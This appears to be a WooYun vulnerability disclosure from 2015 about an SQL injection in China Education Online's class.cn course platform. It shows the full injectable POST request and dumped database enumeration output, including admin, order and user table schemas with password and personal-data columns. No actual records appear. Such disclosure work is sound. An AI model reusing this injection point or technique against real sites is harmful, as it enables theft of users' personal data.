缺陷编号:WooYun-2015-0124024
漏洞标题:中国教育在线某站存在SQL漏洞泄露50W+师生信息且危及主站
相关厂商:eol.cn
漏洞作者:孤风
提交时间:2015-07-02 10:01
公开时间:2015-07-07 10:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-02: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-07: 厂商已经主动忽略漏洞,细节向公众公开
好课网是中国教育在线的在线学习平台,该平台面向学习者提供涵盖基础教育、高等教育以及行业培训等海量优质网络课程,汇聚各行业精英,你可以自由选择你所需的或者感兴趣..
注入点
1 2 3 4 5 6 7 8 9 10 |
POST /ajax/course/list_course HTTP/1.1<br> Content-Length: 188<br> Content-Type: application/x-www-form-urlencoded<br> X-Requested-With: XMLHttpRequest<br> Referer: http://www.class.cn:80/<br> Host: www.class.cn<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br> Accept: */*all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19 |
包括50W+的师生姓名,手机号,身份证号,学生订单,且包括主站的信息
主站的数据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
Database: eol_study2<br> [88 tables]<br> +-----------------------------------+<br> | Study_Aboutfile |<br> | Study_Admin_Manage |<br> | Study_Coupon_Code |<br> | Study_Coupon_List |<br> | Study_Coupon_User_List |<br> | Study_Coupon_log |<br> | Study_Course |<br> | Study_CourseTmp |<br> | Study_Course_Check_Log |<br> | Study_Course_Comment |<br> | Study_Course_DelFile_Log |<br> | Study_Course_Live |<br> | Study_Course_LiveTmp |<br> | Study_Course_Note |<br> | Study_Course_Num |<br> | Study_Course_Scale |<br> | Study_Course_Section |<br> | Study_Course_SectionTmp |<br> | Study_Course_SectionTmp_Log |<br> | Study_Course_Section_Aboutfile |<br> | Study_Course_Section_Log |<br> | Study_Course_Section_Teacher |<br> | Study_Course_Section_Video |<br> | Study_Course_Section_VideoTmp |<br> | Study_Course_Section_VideoTmp_Log |<br> | Study_Course_Section_Video_Delete |<br> | Study_Course_Section_Video_Log |<br> | Study_Course_Total_Scale |<br> | Study_Course_Type |<br> | Study_Email_Send |<br> | Study_Interest |<br> | Study_Live_Callback_Log |<br> | Study_Live_Message_Log |<br> | Study_Live_Order_Log |<br> | Study_Message |<br> | Study_Message_Send |<br> | Study_My_Collect_Course |<br> | Study_My_Study_Course |<br> | Study_Open_Uid_Map |<br> | Study_Order |<br> | Study_Order_Audit_Log |<br> | Study_Order_Haoxue |<br> | Study_Order_Log |<br> | Study_Order_Log_Dezhi |<br> | Study_Order_Pay_Log |<br> | Study_Stat_AboutFile |<br> | Study_Stat_CourseHits |<br> | Study_Stat_CourseScales |<br> | Study_Stat_Course_Day |<br> | Study_Stat_Course_Month |<br> | Study_Stat_Course_Week |<br> | Study_Stat_File_Day |<br> | Study_Stat_File_Month |<br> | Study_Stat_File_Week |<br> | Study_Stat_Keywords |<br> | Study_Stat_Keywords_Day |<br> | Study_Stat_Keywords_Month |<br> | Study_Stat_Keywords_Search |<br> | Study_Stat_Keywords_Week |<br> | Study_Stat_UserComments |<br> | Study_Stat_UserHits |<br> | Study_Stat_User_Day |<br> | Study_Stat_User_Month |<br> | Study_Stat_User_Week |<br> | Study_Teacher |<br> | Study_User |<br> | Study_User_Check_Log |<br> | Study_User_Comment_Log |<br> | Study_User_Comment_Viewtime |<br> | Study_User_Interest_lk |<br> | Study_User_Msg |<br> | Study_User_Num |<br> | Study_User_Organization_Apply |<br> | Study_User_Organization_Applytmp |<br> | Study_User_Pay_Apply |<br> | Study_User_Pay_Applytmp |<br> | Study_User_Person_Apply |<br> | Study_User_Person_Applytmp |<br> | Study_User_Rakeback_Set |<br> | Study_User_Weibo |<br> | Study_Void_Generator |<br> | ci_sessions |<br> | class_active |<br> | class_cart |<br> | class_tag_course |<br> | class_tag_course_type |<br> | class_tag_list |<br> | daemon |<br> +-----------------------------------+ |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
Database: eol_study2<br> Table: Study_Admin_Manage<br> [8 columns]<br> +-----------+-------------+<br> | Column | Type |<br> +-----------+-------------+<br> | Id | int(11) |<br> | LastIp | varchar(20) |<br> | LastLogin | datetime |<br> | LoginNum | int(11) |<br> | Name | varchar(20) |<br> | PassWord | varchar(50) |<br> | Status | tinyint(4) |<br> | Suser | tinyint(4) | |
50W+师生信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 |
Database: class_cn<br> [94 tables]<br> +---------------------------------------+<br> | ci_sessions |<br> | class_active |<br> | class_admin_function |<br> | class_admin_group |<br> | class_admin_group_function |<br> | class_admin_member |<br> | class_admin_member_function |<br> | class_app_course_type |<br> | class_app_feedback |<br> | class_app_version |<br> | class_cart |<br> | class_ccback_section_filename |<br> | class_cooperation_order |<br> | class_coupon_list |<br> | class_coupon_op_log |<br> | class_coupon_public_code |<br> | class_coupon_single_code |<br> | class_coupon_user_list |<br> | class_course_amount |<br> | class_course_cc_video_undel |<br> | class_course_chapter |<br> | class_course_chapter_section |<br> | class_course_check |<br> | class_course_comment |<br> | class_course_detail |<br> | class_course_guide_doc |<br> | class_course_list |<br> | class_course_note |<br> | class_course_rate |<br> | class_course_rate_detail |<br> | class_course_section |<br> | class_course_section_check |<br> | class_course_section_guide_doc |<br> | class_course_section_multi |<br> | class_course_section_teacher |<br> | class_course_type |<br> | class_course_user_recommend |<br> | class_email_send |<br> | class_live_course |<br> | class_live_course_check |<br> | class_live_order |<br> | class_logs_coupon |<br> | class_logs_course_chapter_section_del |<br> | class_logs_course_check |<br> | class_logs_course_delfile |<br> | class_logs_course_section |<br> | class_logs_course_section_check_del |<br> | class_logs_course_section_multi_del |<br> | class_logs_course_update |<br> | class_logs_live_callback |<br> | class_logs_live_course |<br> | class_logs_live_course_del |<br> | class_logs_live_message |<br> | class_logs_order_charge_back |<br> | class_logs_order_check |<br> | class_logs_protocal_change |<br> | class_logs_transcoder |<br> | class_logs_user_change |<br> | class_logs_user_check |<br> | class_message |<br> | class_message_send |<br> | class_offline_protocol |<br> | class_open_uid_map |<br> | class_order |<br> | class_order_dezhi |<br> | class_order_haoxue |<br> | class_order_log |<br> | class_order_pay_log |<br> | class_promote_course |<br> | class_promote_course_check |<br> | class_promote_list |<br> | class_statistic_total |<br> | class_tag_course |<br> | class_tag_course_type |<br> | class_tag_list |<br> | class_user |<br> | class_user_comment |<br> | class_user_comment_viewtimes |<br> | class_user_favorites_course |<br> | class_user_msg |<br> | class_user_num |<br> | class_user_org_cert |<br> | class_user_org_cert_check |<br> | class_user_pay_request |<br> | class_user_pay_request_check |<br> | class_user_person_cert |<br> | class_user_person_cert_check |<br> | class_user_ratio_set |<br> | class_user_settle |<br> | class_user_settle_order |<br> | class_user_study_course |<br> | class_user_teacher |<br> | class_user_weibo |<br> | class_void_generator |<br> +---------------------------------------+ |
订单详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
Database: class_cn<br> Table: class_order<br> [19 columns]<br> +----------------+---------------------+<br> | Column | Type |<br> +----------------+---------------------+<br> | back_time | datetime |<br> | close_pay | decimal(10,2) |<br> | close_status | tinyint(2) unsigned |<br> | close_time | datetime |<br> | course_id | int(11) unsigned |<br> | create_time | timestamp |<br> | create_user_id | int(11) unsigned |<br> | due_pay | decimal(10,2) |<br> | expend_type | tinyint(4) unsigned |<br> | ip | char(15) |<br> | is_back | tinyint(2) unsigned |<br> | oid | char(16) |<br> | order_status | tinyint(2) unsigned |<br> | order_user_id | int(11) unsigned |<br> | pay | decimal(10,2) |<br> | pay_flag | tinyint(3) unsigned |<br> | pay_time | datetime |<br> | source | tinyint(1) unsigned |<br> | void | bigint(20) |<br> +----------------+---------------------+ |
用户信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
Database: class_cn<br> Table: class_user<br> [34 columns]<br> +----------------+---------------------+<br> | Column | Type |<br> +----------------+---------------------+<br> | bad_comment | int(11) unsigned |<br> | contact_email | varchar(50) |<br> | create_time | timestamp |<br> | email | varchar(100) |<br> | gender | enum('0','1','2') |<br> | good_comment | int(11) unsigned |<br> | head_img | varchar(200) |<br> | interest | varchar(1000) |<br> | intro | text |<br> | is_check | tinyint(2) |<br> | is_pub_email | tinyint(2) |<br> | is_pub_mobile | tinyint(2) |<br> | is_pub_qq | tinyint(2) |<br> | is_pub_tel | tinyint(2) |<br> | is_pub_website | tinyint(2) |<br> | is_pub_weibo | tinyint(2) |<br> | login_ip | varchar(20) |<br> | login_num | int(11) |<br> | login_time | datetime |<br> | mobile | char(11) |<br> | nick_name | varchar(100) |<br> | old_head_img | varchar(100) |<br> | pay_status | tinyint(2) unsigned |<br> | qq | varchar(20) |<br> | rand_code | varchar(32) |<br> | real_name | varchar(50) |<br> | source | varchar(10) |<br> | status | tinyint(2) |<br> | tel | varchar(20) |<br> | up_time | datetime |<br> | user_id | int(11) |<br> | user_type | tinyint(2) |<br> | website | varchar(200) |<br> | weibo | varchar(100) |<br> +----------------+---------------------+ |
不知道
危害等级:无影响厂商忽略
忽略时间:2015-07-0710:02
漏洞Rank:15 (WooYun评价)
2015-07-07:谢谢检查,我们尽快修复。
我认为这个要打雷
原文连接
的情况下转载,若非则不得使用我方内容。